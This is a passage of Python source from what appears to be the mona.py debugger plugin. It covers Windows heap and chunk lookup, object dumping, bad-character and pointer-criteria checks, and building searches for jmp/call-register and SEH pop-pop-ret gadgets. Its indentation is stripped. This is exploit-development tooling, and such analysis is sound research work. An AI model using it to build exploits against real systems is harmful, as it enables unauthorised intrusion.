dbg.log(" Object +0x%02x : Ptr to DOM Tree info: 0x%08x" % (offset_domtree,domtreeptr))
while moreparents:
# walk tree, get parents
parentspaces = " " * parentcnt
cmdtorun = "dds poi(poi(poi(0x%08x+0x%02x)+4)) L 1" % (currobj,offset_domtree)
output = dbg.nativeCommand(cmdtorun)
outputlower = output.lower()
outputlines = output.split("\n")
if "vftable" in outputlines[0]:
dbg.log(" %s Parent : %s" % (parentspaces,outputlines[0]))
parts = outputlines[0].split(" ")
try:
currobj = int(parts[0],16)
except:
currobj = 0
else:
moreparents = False
parentcnt += 3
if currobj == 0:
moreparents = False
except:
dbg.logLines(traceback.format_exc(),highlight=True)
pass
return
def showHeapBlockInfo(self):
"""
Find address in heap and print out info about heap, segment, chunk it belongs to
"""
allheaps = []
heapkey = 0
foundinheap = None
foundinsegment = None
foundinva = None
foundinchunk = None
dumpsize = 0
dodump = False
try:
allheaps = dbg.getHeapsAddress()
except:
allheaps = []
for heapbase in allheaps:
mHeap = MnHeap(heapbase)
heapbase_extra = ""
frontendinfo = []
frontendheapptr = 0
frontendheaptype = 0
if win7mode:
heapkey = mHeap.getEncodingKey()
if mHeap.usesLFH():
frontendheaptype = 0x2
heapbase_extra = " [LFH] "
frontendheapptr = mHeap.getLFHAddress()
frontendinfo = [frontendheaptype,frontendheapptr]
segments = mHeap.getHeapSegmentList()
#segments
for seg in segments:
segstart = segments[seg][0]
segend = segments[seg][1]
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
allchunks = walkSegment(FirstEntry,LastValidEntry,heapbase)
for chunkptr in allchunks:
thischunk = allchunks[chunkptr]
thissize = thischunk.size*8
headersize = thischunk.headersize
if self.address >= chunkptr and self.address < (chunkptr + thissize):
# found it !
if not silent:
dbg.log("")
dbg.log("Address 0x%08x found in " % self.address)
thischunk.showChunk(showdata = True)
self.showObjectInfo()
self.showHeapStackTrace(thischunk)
dodump = True
dumpsize = thissize
foundinchunk = thischunk
foundinsegment = seg
foundinheap = heapbase
break
if not foundinchunk == None:
break
# VA
if foundinchunk == None:
# maybe it's in VirtualAllocdBlocks
vachunks = mHeap.getVirtualAllocdBlocks()
for vaptr in vachunks:
thischunk = vachunks[vaptr]
if self.address >= vaptr and self.address <= vaptr + (thischunk.commitsize*8):
if not silent:
dbg.log("")
dbg.log("Address 0x%08x found in VirtualAllocdBlocks of heap 0x%08x" % (self.address,heapbase))
thischunk.showChunk(showdata = True)
self.showObjectInfo()
self.showHeapStackTrace(thischunk)
thissize = thischunk.usersize
dumpsize = thissize
dodump = True
foundinchunk = thischunk
foundinva = vaptr
foundinheap = heapbase
break
# perhaps chunk is in FEA
# if it is, it won't be a VA chunk
if foundinva == None:
if not win7mode:
foundinlal = False
foundinfreelist = False
FrontEndHeap = mHeap.getFrontEndHeap()
if FrontEndHeap > 0:
fea_lal = mHeap.getLookAsideList()
for lal_table_entry in sorted(fea_lal.keys()):
nr_of_chunks = len(fea_lal[lal_table_entry])
lalhead = struct.unpack('<L',dbg.readMemory(FrontEndHeap + (0x30 * lal_table_entry),4))[0]
for chunkindex in fea_lal[lal_table_entry]:
lalchunk = fea_lal[lal_table_entry][chunkindex]
chunksize = lalchunk.size * 8
flag = getHeapFlag(lalchunk.flag)
if (self.address >= lalchunk.chunkptr) and (self.address < lalchunk.chunkptr+chunksize):
foundinlal = True
if not silent:
dbg.log("Address is part of chunk on LookAsideList[%d], heap 0x%08x" % (lal_table_entry,mHeap.heapbase))
break
if foundinlal:
expectedsize = lal_table_entry * 8
if not silent:
dbg.log(" LAL [%d] @0x%08x, Expected Chunksize: 0x%x (%d), %d chunks, Flink: 0x%08x" % (lal_table_entry,FrontEndHeap + (0x30 * lal_table_entry),expectedsize,expectedsize,nr_of_chunks,lalhead))
for chunkindex in fea_lal[lal_table_entry]:
lalchunk = fea_lal[lal_table_entry][chunkindex]
foundchunk = lalchunk
chunksize = lalchunk.size * 8
flag = getHeapFlag(lalchunk.flag)
extra = " "
if (self.address >= lalchunk.chunkptr) and (self.address < lalchunk.chunkptr+chunksize):
extra = " --> "
if not silent:
dbg.log("%sChunkPtr: 0x%08x, UserPtr: 0x%08x, Flink: 0x%08x, ChunkSize: 0x%x, UserSize: 0x%x, UserSpace: 0x%x (%s)" % (extra,lalchunk.chunkptr,lalchunk.userptr,lalchunk.flink,chunksize,lalchunk.usersize,lalchunk.usersize + lalchunk.remaining,flag))
if not silent:
self.showObjectInfo()
dumpsize = chunksize
dodump = True
break
if not foundinlal:
# or maybe in BEA
thisfreelist = mHeap.getFreeList()
thisfreelistinusebitmap = mHeap.getFreeListInUseBitmap()
for flindex in thisfreelist:
freelist_addy = heapbase + 0x178 + (8 * flindex)
expectedsize = ">1016"
expectedsize2 = ">0x%x" % 1016
if flindex != 0:
expectedsize2 = str(8 * flindex)
expectedsize = "0x%x" % (8 * flindex)
for flentry in thisfreelist[flindex]:
freelist_chunk = thisfreelist[flindex][flentry]
chunksize = freelist_chunk.size * 8
if (self.address >= freelist_chunk.chunkptr) and (self.address < freelist_chunk.chunkptr+chunksize):
foundinfreelist = True
if not silent:
dbg.log("Address is part of chunk on FreeLists[%d] at 0x%08x, heap 0x%08x:" % (flindex,freelist_addy,mHeap.heapbase))
break
if foundinfreelist:
flindicator = 0
for flentry in thisfreelist[flindex]:
freelist_chunk = thisfreelist[flindex][flentry]
chunksize = freelist_chunk.size * 8
extra = " "
if (self.address >= freelist_chunk.chunkptr) and (self.address < freelist_chunk.chunkptr+chunksize):
extra = " --> "
foundchunk = freelist_chunk
if not silent:
dbg.log("%sChunkPtr: 0x%08x, UserPtr: 0x%08x, Flink: 0x%08x, Blink: 0x%08x, ChunkSize: 0x%x (%d), Usersize: 0x%x (%d)" % (extra,freelist_chunk.chunkptr,freelist_chunk.userptr,freelist_chunk.flink,freelist_chunk.blink,chunksize,chunksize,freelist_chunk.usersize,freelist_chunk.usersize))
if flindex != 0 and chunksize != (8*flindex):
dbg.log(" ** Header may be corrupted! **", highlight = True)
flindicator = 1
if flindex > 1 and int(thisfreelistinusebitmap[flindex]) != flindicator:
if not silent:
dbg.log(" ** FreeListsInUseBitmap mismatch for index %d! **" % flindex, highlight = True)
if not silent:
self.showObjectInfo()
dumpsize = chunksize
dodump = True
break
if dodump and dumpsize > 0 and dumpsize < 1025 and not silent:
self.dumpObjectAtLocation(dumpsize)
return foundinheap, foundinsegment, foundinva, foundinchunk
def showHeapStackTrace(self,thischunk):
# show stacktrace if any
if __DEBUGGERAPP__ == "WinDBG":
stacktrace_address = thischunk.dph_block_information_stacktrace
stacktrace_index = thischunk.dph_block_information_traceindex
stacktrace_startstamp = 0xabcdaaaa
if thischunk.hasust and stacktrace_address > 0:
if stacktrace_startstamp == thischunk.dph_block_information_startstamp:
cmd2run = "dds 0x%08x L 24" % (stacktrace_address)
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
if "!" in output:
dbg.log("Stack trace, index 0x%x:" % stacktrace_index)
dbg.log("--------------------------")
for outputline in outputlines:
if "!" in outputline:
lineparts = outputline.split(" ")
if len(lineparts) > 2:
firstpart = len(lineparts[0])+1
dbg.log(outputline[firstpart:])
return
def memLocation(self):
"""
Gets the memory location associated with a given pointer (modulename, stack, heap or empty)
Arguments:
None
Return:
String
"""
memloc = self.belongsTo()
if memloc == "":
if self.isOnStack():
return "Stack"
if self.isInHeap():
return "Heap"
return "??"
return memloc
def getPtrFunction(self):
funcinfo = ""
global silent
silent = True
if __DEBUGGERAPP__ == "WinDBG":
lncmd = "ln 0x%08x" % self.address
lnoutput = dbg.nativeCommand(lncmd)
for line in lnoutput.split("\n"):
if line.replace(" ","") != "" and line.find("%08x" % self.address) > -1:
lineparts = line.split("|")
funcrefparts = lineparts[0].split(")")
if len(funcrefparts) > 1:
funcinfo = funcrefparts[1].replace(" ","")
break
if funcinfo == "":
memloc = self.belongsTo()
if not memloc == "":
mod = MnModule(memloc)
if not mod is None:
start = mod.moduleBase
offset = self.address - start
offsettxt = ""
if offset > 0:
offsettxt = "+0x%08x" % offset
else:
offsettxt = "__base__"
funcinfo = memloc+offsettxt
silent = False
return funcinfo
def dumpObjectAtLocation(self,size,levels=0,nestedsize=0,customthislog="",customlogfile=""):
dumpdata = {}
origdumpdata = {}
if __DEBUGGERAPP__ == "WinDBG":
addy = self.address
if not silent:
dbg.log("")
dbg.log("----------------------------------------------------")
dbg.log("[+] Dumping object at 0x%08x, 0x%02x bytes" % (addy,size))
if levels > 0:
dbg.log("[+] Also dumping up to %d levels deep, max size of nested objects: 0x%02x bytes" % (levels, nestedsize))
dbg.log("")
parentlist = []
levelcnt = 0
if customthislog == "" and customlogfile == "":
logfile = MnLog("dumpobj.txt")
thislog = logfile.reset()
else:
logfile = customlogfile
thislog = customthislog
addys = [addy]
parent = ""
parentdata = {}
while levelcnt <= levels:
thisleveladdys = []
for addy in addys:
cmdtorun = "dps 0x%08x L 0x%02x/%x" % (addy,size,archValue(4,8))
startaddy = addy
endaddy = addy + size
output = dbg.nativeCommand(cmdtorun)
outputlines = output.split("\n")
offset = 0
for outputline in outputlines:
if not outputline.replace(" ","") == "":
loc = outputline[0:archValue(8,17)].replace("`","")
content = outputline[archValue(10,19):archValue(18,36)].replace("`","")
symbol = outputline[archValue(19,37):]
if not "??" in content and symbol.replace(" ","") == "":
contentaddy = hexStrToInt(content)
info = self.getLocInfo(hexStrToInt(loc),contentaddy,startaddy,endaddy)
info.append(content)
dumpdata[hexStrToInt(loc)] = info
else:
info = ["",symbol,"",content]
dumpdata[hexStrToInt(loc)] = info
if addy in parentdata:
pdata = parentdata[addy]
parent = "Referenced at 0x%08x (object 0x%08x, offset +0x%02x)" % (pdata[0],pdata[1],pdata[0]-pdata[1])
else:
parent = ""
self.printObjDump(dumpdata,logfile,thislog,size,parent)
for loc in dumpdata:
thisdata = dumpdata[loc]
if thisdata[0] == "ptr_obj":
thisptr = int(thisdata[3],16)
thisleveladdys.append(thisptr)
parentdata[thisptr] = [loc,addy]
if levelcnt == 0:
origdumpdata = dumpdata
dumpdata = {}
addys = thisleveladdys
size = nestedsize
levelcnt += 1
dumpdata = origdumpdata
return dumpdata
def printObjDump(self,dumpdata,logfile,thislog,size=0,parent=""):
# dictionary, key = address
# 0 = type
# 1 = content info
# 2 = string type
# 3 = content
sortedkeys = sorted(dumpdata)
if len(sortedkeys) > 0:
startaddy = sortedkeys[0]
sizem = ""
parentinfo = ""
if size > 0:
sizem = " (0x%02x bytes)" % size
logfile.write("",thislog)
if parent == "":
logfile.write("=" * 60,thislog)
line = ">> Object at 0x%08x%s:" % (startaddy,sizem)
if not silent:
dbg.log("")
dbg.log(line)
logfile.write(line,thislog)
if parent != "":
line = " %s" % parent
if not silent:
dbg.log(line)
logfile.write(line,thislog)
line = "Offset Address Contents Info"
if arch == 64:
line = "Offset Address Contents Info"
logfile.write(line,thislog)
if not silent:
dbg.log(line)
line = "------ ------- -------- -----"
if arch == 64:
line = "------ ------- -------- -----"
logfile.write(line,thislog)
if not silent:
dbg.log(line)
offset = 0
for loc in sortedkeys:
info = dumpdata[loc]
if len(info) > 1:
content = ""
if len(info) > 3:
content = info[3]
contentinfo = toAsciiOnly(info[1])
offsetstr = toSize("%02x" % offset,4)
line = "+%s 0x%08x | 0x%s %s" % (offsetstr,loc,content,contentinfo)
if not silent:
dbg.log(line)
logfile.write(line,thislog)
offset += archValue(4,8)
if len(sortedkeys) > 0:
dbg.log("")
return
def getLocInfo(self,loc,addy,startaddy,endaddy):
locinfo = []
if addy >= startaddy and addy <= endaddy:
offset = addy - startaddy
locinfo = ["self","ptr to self+0x%08x" % offset,""]
return locinfo
ismapped = False
extra = ""
ptrx = MnPointer(addy)
memloc = ptrx.memLocation()
if not "??" in memloc:
if "Stack" in memloc or "Heap" in memloc:
extra = "(%s) " % memloc
else:
detailmemloc = ptrx.getPtrFunction()
extra = " (%s.%s)" % (memloc,detailmemloc)
# maybe it's a pointer to an object ?
cmd2run = "dps 0x%08x L 1" % addy
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
if len(outputlines) > 0:
if not "??" in outputlines[0]:
ismapped = True
ptraddy = outputlines[0][archValue(10,19):archValue(18,36)].replace("`","")
ptrinfo = outputlines[0][archValue(19,37):]
if ptrinfo.replace(" ","") != "":
if "vftable" in ptrinfo or "Heap" in memloc:
locinfo = ["ptr_obj","%sptr to 0x%08x : %s" % (extra,hexStrToInt(ptraddy),ptrinfo),str(addy)]
else:
locinfo = ["ptr","%sptr to 0x%08x : %s" % (extra,hexStrToInt(ptraddy),ptrinfo),str(addy)]
return locinfo
if ismapped:
# pointer to a string ?
try:
strdata = dbg.readString(addy)
if len(strdata) > 2:
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to ASCII (0x%02x) '%s'" % (extra,len(strdata),datastr),"ascii"]
return locinfo
except:
pass
# maybe it's unicode ?
try:
strdata = dbg.readWString(addy)
if len(strdata) > 2:
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to UNICODE (0x%02x) '%s'" % (extra,len(strdata),datastr),"unicode"]
return locinfo
except:
pass
# maybe the pointer points into a function ?
ptrf = ptrx.getPtrFunction()
if not ptrf == "":
locinfo = ["ptr_func","%sptr to %s" % (extra,ptrf),str(addy)]
return locinfo
# BSTR Unicode ?
try:
bstr = struct.unpack('<L',dbg.readMemory(addy,4))[0]
strdata = dbg.readWString(addy+4)
if len(strdata) > 2 and (bstr == len(strdata)+1):
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to BSTR UNICODE (0x%02x) '%s'" % (extra,bstr,datastr),"unicode"]
return locinfo
except:
pass
# pointer to a BSTR ASCII?
try:
strdata = dbg.readString(addy+4)
if len(strdata) > 2 and (bstr == len(strdata)/2):
datastr = strdata
if len(strdata) > 80:
datastr = strdata[0:80] + "..."
locinfo = ["ptr_str","%sptr to BSTR ASCII (0x%02x) '%s'" % (extra,bstr,datastr),"ascii"]
return locinfo
except:
pass
# pointer itself is a string ?
if ptrx.isUnicode:
b1,b2,b3,b4,b5,b6,b7,b8 = (0,)*8
if arch == 32:
b1,b2,b3,b4 = splitAddress(addy)
if arch == 64:
b1,b2,b3,b4,b5,b6,b7,b8 = splitAddress(addy)
ptrstr = toAscii(toHexByte(b2)) + toAscii(toHexByte(b4))
if arch == 64:
ptrstr += toAscii(toHexByte(b6)) + toAscii(toHexByte(b8))
if ptrstr.replace(" ","") != "" and not toHexByte(b2) == "00":
locinfo = ["str","= UNICODE '%s' %s" % (ptrstr,extra),"unicode"]
return locinfo
if ptrx.isAsciiPrintable:
b1,b2,b3,b4,b5,b6,b7,b8 = (0,)*8
if arch == 32:
b1,b2,b3,b4 = splitAddress(addy)
if arch == 64:
b1,b2,b3,b4,b5,b6,b7,b8 = splitAddress(addy)
ptrstr = toAscii(toHexByte(b1)) + toAscii(toHexByte(b2)) + toAscii(toHexByte(b3)) + toAscii(toHexByte(b4))
if arch == 64:
ptrstr += toAscii(toHexByte(b5)) + toAscii(toHexByte(b6)) + toAscii(toHexByte(b7)) + toAscii(toHexByte(b8))
if ptrstr.replace(" ","") != "" and not toHexByte(b1) == "00" and not toHexByte(b2) == "00" and not toHexByte(b3) == "00" and not toHexByte(b4) == "00":
if arch != 64 or (not toHexByte(b5) == "00" and not toHexByte(b6) == "00" and not toHexByte(b7) == "00" and not toHexByte(b8) == "00"):
locinfo = ["str","= ASCII '%s' %s" % (ptrstr,extra),"ascii"]
return locinfo
# pointer to heap ?
if "Heap" in memloc:
if not "??" in outputlines[0]:
ismapped = True
ptraddy = outputlines[0][archValue(10,19):archValue(18,36)]
locinfo = ["ptr_obj","%sptr to 0x%08x" % (extra,hexStrToInt(ptraddy)),str(addy)]
return locinfo
# nothing special to report
return ["","",""]
#---------------------------------------#
# Various functions #
#---------------------------------------#
def getDefaultProcessHeap():
peb = dbg.getPEBAddress()
defprocheap = struct.unpack('<L',dbg.readMemory(peb+0x18,4))[0]
return defprocheap
def getSortedSegmentList(heapbase):
segments = getSegmentsForHeap(heapbase)
sortedsegments = []
for seg in segments:
sortedsegments.append(seg)
sortedsegments.sort()
return sortedsegments
def getSegmentList(heapbase):
return getSegmentsForHeap(heapbase)
def getSegmentsForHeap(heapbase):
# either return the base of the segment, or the base of the default process heap
allsegmentsfound = False
segmentinfo = {}
global segmentlistCache
if heapbase in segmentlistCache:
return segmentlistCache[heapbase]
else:
try:
if win7mode:
# first one = heap itself
offset = getOsOffset("SegmentList")
segmentcnt = 0
subtract = archValue(0x10,0x18)
firstoffset = 0
firstsegbase = readPtrSizeBytes(heapbase + archValue(0x24,0x40))
firstsegend = readPtrSizeBytes(heapbase + archValue(0x28,0x48))
if not firstsegbase in segmentinfo:
segmentinfo[heapbase] = [firstsegbase,firstsegend,firstsegbase,firstsegend]
# optional list with additional segments
# nested list
segbase = heapbase
lastindex = heapbase + offset
allsegmentsfound = False
lastsegment = readPtrSizeBytes(heapbase+offset+archValue(4,8)) - subtract
if heapbase == lastsegment:
allsegmentsfound = True
segmentcnt = 1
while not allsegmentsfound and segmentcnt < 100:
nextbase = readPtrSizeBytes(segbase + archValue(0x10,0x18)) - subtract
segbase = nextbase
if nextbase > 0 and (nextbase+subtract != lastindex):
segstart = readPtrSizeBytes(segbase + archValue(0x24,0x40))
segend = readPtrSizeBytes(segbase + archValue(0x28,0x48))
if not segbase in segmentinfo:
segmentinfo[segbase] = [segbase,segend,segstart,segend]
else:
allsegmentsfound = True
segmentcnt += 1
else:
offset = archValue(0x058,0x0a0)
i = 0
while not allsegmentsfound:
thisbase = readPtrSizeBytes(heapbase + offset + i*archValue(4,8))
if thisbase > 0 and not thisbase in segmentinfo:
# get start and end of segment
segstart = thisbase
segend = getSegmentEnd(segstart)
# get first and last valid entry
firstentry = readPtrSizeBytes(segstart + archValue(0x20,0x38))
lastentry = readPtrSizeBytes(segstart + archValue(0x24,0x40))
segmentinfo[thisbase] = [segstart,segend,firstentry,lastentry]
else:
allsegmentsfound = True
i += 1
# avoid infinite loop
if i > 100:
allsegmentsfound = True
except:
pass
segmentlistCache[heapbase] = segmentinfo
return segmentinfo
def containsBadChars(address,badchars="\x0a\x0d"):
"""
checks if the address contains bad chars
Arguments:
address - the address
badchars - string with the characters that should be avoided (defaults to 0x0a and 0x0d)
Return:
Boolean - True if badchars are found
"""
bytes = splitAddress(address)
chars = []
for byte in bytes:
chars.append(chr(byte))
# check each char
for char in chars:
if char in badchars:
return True
return False
def meetsCriteria(pointer,criteria):
"""
checks if an address meets the listed criteria
Arguments:
pointer - the MnPointer instance of the address
criteria - a dictionary with all the criteria to be met
Return:
Boolean - True if all the conditions are met
"""
# Unicode
if "unicode" in criteria and not (pointer.isUnicode or pointer.unicodeTransform != ""):
return False
if "unicoderev" in criteria and not pointer.isUnicodeRev:
return False
# Ascii
if "ascii" in criteria and not pointer.isAscii:
return False
# Ascii printable
if "asciiprint" in criteria and not pointer.isAsciiPrintable:
return False
# Uppercase
if "upper" in criteria and not pointer.isUppercase:
return False
# Lowercase
if "lower" in criteria and not pointer.isLowercase:
return False
# Uppercase numeric
if "uppernum" in criteria and not pointer.isUpperNum:
return False
# Lowercase numeric
if "lowernum" in criteria and not pointer.isLowerNum:
return False
# Numeric
if "numeric" in criteria and not pointer.isNumeric:
return False
# Alpha numeric
if "alphanum" in criteria and not pointer.isAlphaNumeric:
return False
# Bad chars
if "badchars" in criteria and containsBadChars(pointer.getAddress(), criteria["badchars"]):
return False
# Nulls
if "nonull" in criteria and pointer.hasNulls:
return False
if "startswithnull" in criteria and not pointer.startsWithNull:
return False
return True
def search(sequences,criteria=[]):
"""
Alias for 'searchInRange'
search for byte sequences in a specified address range
Arguments:
sequences - array of byte sequences to search for
start - the start address of the search (defaults to 0)
end - the end address of the search
criteria - Dictionary containing the criteria each pointer should comply with
Return:
Dictionary (opcode sequence => List of addresses)
"""
return searchInRange(sequences,criteria)
def searchInRange(sequences, start=0, end=TOP_USERLAND,criteria=[]):
"""
search for byte sequences in a specified address range
Arguments:
sequences - array of byte sequences to search for
start - the start address of the search (defaults to 0)
end - the end address of the search
criteria - Dictionary containing the criteria each pointer should comply with
Return:
Dictionary (opcode sequence => List of addresses)
"""
if not "accesslevel" in criteria:
criteria["accesslevel"] = "*"
global ptr_counter
global ptr_to_get
found_opcodes = {}
if (ptr_to_get < 0) or (ptr_to_get > 0 and ptr_counter < ptr_to_get):
if not sequences:
return {}
# check that start is before end
if start > end:
start, end = end, start
dbg.setStatusBar("Searching...")
dbg.getMemoryPages()
process_error_found = False
for a in dbg.MemoryPages.keys():
if (ptr_to_get < 0) or (ptr_to_get > 0 and ptr_counter < ptr_to_get):
# get end address of the page
page_start = a
page_size = dbg.MemoryPages[a].getSize()
page_end = a + page_size
if ( start > page_end or end < page_start ):
# we are outside the search range, skip
continue
if (not meetsAccessLevel(dbg.MemoryPages[a],criteria["accesslevel"])):
#skip this page, not executable
continue
# if the criteria check for nulls or unicode, we can skip
# modules that start with 00
start_fb = toHex(page_start)[0:2]
end_fb = toHex(page_end)[0:2]
if ( ("nonull" in criteria and criteria["nonull"]) and start_fb == "00" and end_fb == "00" ):
if not silent:
dbg.log(" !Skipped search of range %08x-%08x (Has nulls)" % (page_start,page_end))
continue
if (( ("startswithnull" in criteria and criteria["startswithnull"]))
and (start_fb != "00" or end_fb != "00")):
if not silent:
dbg.log(" !Skipped search of range %08x-%08x (Doesn't start with null)" % (page_start,page_end))
continue
mem = dbg.MemoryPages[a].getMemory()
if not mem:
continue
# loop on each sequence
for seq in sequences:
if (ptr_to_get < 0) or (ptr_to_get > 0 and ptr_counter < ptr_to_get):
buf = None
human_format = ""
if type(seq) == str:
human_format = seq.replace("\n"," # ")
buf = dbg.assemble(seq)
else:
human_format = seq[0].replace("\n"," # ")
buf = seq[1]
recur_find = []
try:
buf_len = len(buf)
mem_list = mem.split( buf )
total_length = buf_len * -1
except:
process_error_found = True
dbg.log(" ** Unable to process searchPattern '%s'. **" % human_format)
break
for i in mem_list:
total_length = total_length + len(i) + buf_len
seq_address = a + total_length
recur_find.append( seq_address )
#The last one is the remaining slice from the split
#so remove it from the list
del recur_find[ len(recur_find) - 1 ]
page_find = []
for i in recur_find:
if ( i >= start and i <= end ):
ptr = MnPointer(i)
# check if pointer meets criteria
if not meetsCriteria(ptr, criteria):
continue
page_find.append(i)
ptr_counter += 1
if ptr_to_get > 0 and ptr_counter >= ptr_to_get:
#stop search
if human_format in found_opcodes:
found_opcodes[human_format] += page_find
else:
found_opcodes[human_format] = page_find
return found_opcodes
#add current pointers to the list and continue
if len(page_find) > 0:
if human_format in found_opcodes:
found_opcodes[human_format] += page_find
else:
found_opcodes[human_format] = page_find
if process_error_found:
break
return found_opcodes
# search for byte sequences in a module
def searchInModule(sequences, name,criteria=[]):
"""
search for byte sequences in a specified module
Arguments:
sequences - array of byte sequences to search for
name - the name of the module to search in
Return:
Dictionary (text opcode => array of addresses)
"""
module = dbg.getModule(name)
if(not module):
self.log("module %s not found" % name)
return []
# get the base and end address of the module
start = module.getBaseAddress()
end = start + module.getSize()
return searchInRange(sequences, start, end, criteria)
def getRangesOutsideModules():
"""
This function will enumerate all memory ranges that are not asssociated with a module
Arguments : none
Returns : array of arrays, each containing a start and end address
"""
ranges=[]
moduleranges=[]
#get all ranges associated with modules
#force full rebuild to get all modules
populateModuleInfo()
for thismodule,modproperties in g_modules.iteritems():
top = 0
base = 0
for modprop,modval in modproperties.iteritems():
if modprop == "top":
top = modval
if modprop == "base":
base = modval
moduleranges.append([base,top])
#sort them
moduleranges.sort()
#get all ranges before, after and in between modules
startpointer = 0
endpointer = TOP_USERLAND
for modbase,modtop in moduleranges:
endpointer = modbase-1
ranges.append([startpointer,endpointer])
startpointer = modtop+1
ranges.append([startpointer,TOP_USERLAND])
#return array
return ranges
def isModuleLoadedInProcess(modulename):
if len(g_modules) == 0:
populateModuleInfo()
modulefound = False
module = dbg.getModule(modulename)
if(not module):
modulefound = False
else:
modulefound = True
return modulefound
def UnicodeTransformInfo(hexaddr):
"""
checks if the address can be used as unicode ansi transform
Arguments:
hexaddr - a string containing the address in hex format (4 bytes - 8 characters)
Return:
string with unicode transform info, or empty if address is not unicode transform
"""
outstring = ""
transform=0
almosttransform=0
begin = hexaddr[0] + hexaddr[1]
middle = hexaddr[4] + hexaddr[5]
twostr=hexaddr[2]+hexaddr[3]
begintwostr = hexaddr[6]+hexaddr[7]
threestr=hexaddr[4]+hexaddr[5]+hexaddr[6]
fourstr=hexaddr[4]+hexaddr[5]+hexaddr[6]+hexaddr[7]
beginfourstr = hexaddr[0]+hexaddr[1]+hexaddr[2]+hexaddr[3]
threestr=threestr.upper()
fourstr=fourstr.upper()
begintwostr = begintwostr.upper()
beginfourstr = beginfourstr.upper()
uniansiconv = [ ["20AC","80"], ["201A","82"],
["0192","83"], ["201E","84"], ["2026","85"],
["2020","86"], ["2021","87"], ["02C6","88"],
["2030","89"], ["0106","8A"], ["2039","8B"],
["0152","8C"], ["017D","8E"], ["2018","91"],
["2019","92"], ["201C","93"], ["201D","94"],
["2022","95"], ["2013","96"], ["2014","97"],
["02DC","98"], ["2122","99"], ["0161","9A"],
["203A","9B"], ["0153","9C"], ["017E","9E"],
["0178","9F"]
]
# 4 possible cases :
# 00xxBBBB
# 00xxBBBC (close transform)
# AAAA00xx
# AAAABBBB
convbyte=""
transbyte=""
ansibytes=""
#case 1 and 2
if begin == "00":
for ansirec in uniansiconv:
if ansirec[0]==fourstr:
convbyte=ansirec[1]
transbyte=ansirec[1]
transform=1
break
if transform==1:
outstring +="unicode ansi transformed : 00"+twostr+"00"+convbyte+","
ansistring=""
for ansirec in uniansiconv:
if ansirec[0][:3]==threestr:
if (transform==0) or (transform==1 and ansirec[1] <> transbyte):
convbyte=ansirec[1]
ansibytes=ansirec[0]
ansistring=ansistring+"00"+twostr+"00"+convbyte+"->00"+twostr+ansibytes+" / "
almosttransform=1
if almosttransform==1:
if transform==0:
outstring += "unicode possible ansi transform(s) : " + ansistring
else:
outstring +=" / alternatives (close pointers) : " + ansistring
#case 3
if middle == "00":
transform = 0
for ansirec in uniansiconv:
if ansirec[0]==beginfourstr:
convbyte=ansirec[1]
transform=1
break
if transform==1:
outstring +="unicode ansi transformed : 00"+convbyte+"00"+begintwostr+","
#case 4
if begin != "00" and middle != "00":
convbyte1=""
convbyte2=""
transform = 0
for ansirec in uniansiconv:
if ansirec[0]==beginfourstr:
convbyte1=ansirec[1]
transform=1
break
if transform == 1:
for ansirec in uniansiconv:
if ansirec[0]==fourstr:
convbyte2=ansirec[1]
transform=2
break
if transform==2:
outstring +="unicode ansi transformed : 00"+convbyte1+"00"+convbyte2+","
# done
outstring = outstring.rstrip(" / ")
if outstring:
if not outstring.endswith(","):
outstring += ","
return outstring
def getSearchSequences(searchtype,searchcriteria="",type="",criteria={}):
"""
will build array with search sequences for a given search type
Arguments:
searchtype = "jmp", "seh"
SearchCriteria (optional):
<register> in case of "jmp" : string containing a register
Return:
array with all searches to perform
"""
offsets = [ "", "0x04","0x08","0x0c","0x10","0x12","0x1C","0x20","0x24"]
regs=["eax","ebx","ecx","edx","esi","edi","ebp"]
search=[]
if searchtype.lower() == "jmp":
if not searchcriteria:
searchcriteria = "esp"
searchcriteria = searchcriteria.lower()
min = 0
max = 0
if "mindistance" in criteria:
min = criteria["mindistance"]
if "maxdistance" in criteria:
max = criteria["maxdistance"]
minval = min
while minval <= max:
extraval = ""
if minval <> 0:
operator = ""
negoperator = "-"
if minval < 0:
operator = "-"
negoperator = ""
thisval = str(minval).replace("-","")
thishexval = toHex(int(thisval))
extraval = operator + thishexval
if minval == 0:
search.append("jmp " + searchcriteria )
search.append("call " + searchcriteria)
for roffset in offsets:
search.append("push "+searchcriteria+"\nret "+roffset)
for reg in regs:
if reg != searchcriteria:
search.append("push " + searchcriteria + "\npop "+reg+"\njmp "+reg)
search.append("push " + searchcriteria + "\npop "+reg+"\ncall "+reg)
search.append("mov "+reg+"," + searchcriteria + "\njmp "+reg)
search.append("mov "+reg+"," + searchcriteria + "\ncall "+reg)
search.append("xchg "+reg+","+searchcriteria+"\njmp " + reg)
search.append("xchg "+reg+","+searchcriteria+"\ncall " + reg)
for roffset in offsets:
search.append("push " + searchcriteria + "\npop "+reg+"\npush "+reg+"\nret "+roffset)
search.append("mov "+reg+"," + searchcriteria + "\npush "+reg+"\nret "+roffset)
search.append("xchg "+reg+","+searchcriteria+"\npush " + reg + "\nret " + roffset)
else:
# offset jumps
search.append("add " + searchcriteria + "," + operator + thishexval + "\njmp " + searchcriteria)
search.append("add " + searchcriteria + "," + operator + thishexval + "\ncall " + searchcriteria)
search.append("sub " + searchcriteria + "," + negoperator + thishexval + "\njmp " + searchcriteria)
search.append("sub " + searchcriteria + "," + negoperator + thishexval + "\ncall " + searchcriteria)
for roffset in offsets:
search.append("add " + searchcriteria + "," + operator + thishexval + "\npush " + searchcriteria + "\nret " + roffset)
search.append("sub " + searchcriteria + "," + negoperator + thishexval + "\npush " + searchcriteria + "\nret " + roffset)
if minval > 0:
search.append("jmp " + searchcriteria + extraval)
search.append("call " + searchcriteria + extraval)
minval += 1
if searchtype.lower() == "seh":
for roffset in offsets:
for r1 in regs:
search.append( ["add esp,4\npop " + r1+"\nret "+roffset,dbg.assemble("add esp,4\npop " + r1+"\nret "+roffset)] )
search.append( ["pop " + r1+"\nadd esp,4\nret "+roffset,dbg.assemble("pop " + r1+"\nadd esp,4\nret "+roffset)] )
for r2 in regs:
